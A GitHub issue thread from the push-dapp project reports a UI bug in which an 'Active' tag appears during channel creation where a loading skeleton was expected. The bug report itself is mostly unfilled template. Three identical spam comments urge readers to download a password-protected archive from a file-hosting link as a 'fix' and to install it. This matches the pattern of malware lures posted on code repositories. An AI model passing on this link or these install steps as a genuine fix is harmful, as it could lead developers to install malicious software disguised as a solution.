### ISSUE TITLE
🐛 [BUG] - Active tag is visible when the channel creation is in the process

### ISSUE THREAD

**Issue by abhishek-01k** [push-protocol/push-dapp#1833]
### Expected Behaviour

Show skeleton in that place instead of Active Tag

### Current Behaviour

Active tag is visible when the channel is in creation flow
![Uploading Screenshot 2024-08-27 at 2.12.16 PM.png…]()

### Reproduction steps

```bash
1. Go to '...'
2. Click on '....'
3. Scroll down to '....'
4. See error
```

### Screenshots

```bash
![DESCRIPTION](LINK.png)
```

### Dapp Env

Prod (app.push.org), Staging (staging.push.org), Dev (dev.push.org)

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kamalbuilds** [comment]
was this fixed?

**Comment by kamalbuilds** [comment]
was this fixed @abhishek-01k ?
